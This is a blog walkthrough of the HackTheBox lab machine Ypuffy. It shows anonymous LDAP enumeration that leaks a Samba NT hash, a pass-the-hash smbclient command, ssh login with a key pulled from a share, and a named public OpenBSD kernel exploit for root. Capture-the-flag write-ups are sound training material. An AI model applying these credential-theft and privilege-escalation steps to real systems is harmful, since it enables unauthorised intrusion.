Ypuffy @ HackTheBox

08Feb

Ypuffy @ HackTheBox

By CTF , , ,

Ypuffy is a rather unique machine on hackthebox.eu because it features OpenBSD as operating system. In my version of getting root it didn’t matter too much unfortunately because a public kernel exploit gave root quite easily. Ypuffy features ldap and smb enumeration and then application of public exploit for OpenBSD.

User Flag

Scanning the box shows that port 389 is open and that one can potentially retrieve information without the need of credentials.

...
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)
...

Using nmaps ldap-search some interesting information can be revealed:

...
|     dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
|         uid: alice1978
|         cn: Alice
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: sambaSamAccount
|         userPassword: {BSDAUTH}alice1978
|         uidNumber: 5000
|         gidNumber: 5000
|         gecos: Alice
|         homeDirectory: /home/alice1978
|         loginShell: /bin/ksh
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
|         displayName: Alice
|         sambaAcctFlags: [U          ]
|         sambaPasswordHistory: 
|         sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
|         sambaPwdLastSet: 1532916644
...

The credentials can be used to connect via smb:

python2 /usr/bin/smbclient.py YPUFFY/alice1978@10.10.10.107 -hashes 00000000000000000000000000000000:0B186E661BBDBDCF6047784DE8B9FD8B

Issuing shares it can be seen that a share named
“alice” exist. With use alice it can be selected, a private key named “my_private_key.ppk” retrieved and the key been used to ssh into the box as “alice1987” to grab the userflag:

ssh alice1978@10.10.10.107 -i alice.priv

Root Flag

Turns out the box uses Openbsd – looking for fitting kernel exploits, raptor_xorgasm can be found. After compiling and executing the exploit we become root and can read flag.

Share this post

Author

Related Posts

17Apr

Exploiting Gitlab 12.8.1 – Laboratory @ HackTheBox

We are going to solve Laboratory, which is an easy linux machine on HackTheBox with a CVE on Gitlab for... read more

10Apr

APT @ HackTheBox

APT is a 50-point machine on HackTheBox which involves getting the IPv6 Address via MS-RPC, credential spraying, and reading the... read more

24Jul

Drupalgeddon & Sudo Snap Install – Armageddon @ HackTheBox

We are solving Armageddon, a really easy 20-point machine on HackTheBox that involves the drupalgeddon exploit, reading & cracking a... read more

16May

SwagShop @ HackTheBox

SwagShop is a very easy machine on hackthebox, involving a public exploit and sudo abuse. read more

29Feb

Scavenger @ HackTheBox

Scavenger is a 40 Point machine on hackthebox that involves a lot of enumeration, a SQL injection, and in my... read more

17Jul

LFI to RCE, Sticky Notes & SQLi – Breadcrumbs @ HackTheBox

We are solving Breadcrumbs, a 40-point Windows machine on HackTheBox. For user, we exploit an LFI to read PHP source... read more

22Feb

Zipper @ HackTheBox

This post is a walkthrough of Zipper, an interesting machine on hackthebox.eu featuring the zabbix network monitoring application. It involves... read more

03Apr

Hacking Time @ HackTheBox

Time is a 30-point machine on HackTheBox that involves using a public exploit for a CVE and overwriting a shell... read more

16Feb

Giddy @ HackTheBox

In this post I will give a quick walkthrough on Giddy from hackthebox.eu. The machine involves (automated) sql injection, stealing... read more

16Mar

Carrier @ HackTheBox

Carrier is a nice, medium difficulty machine on hackthebox.eu featuring information retrieval via snmp, command injection and bgp hijacking. The... read more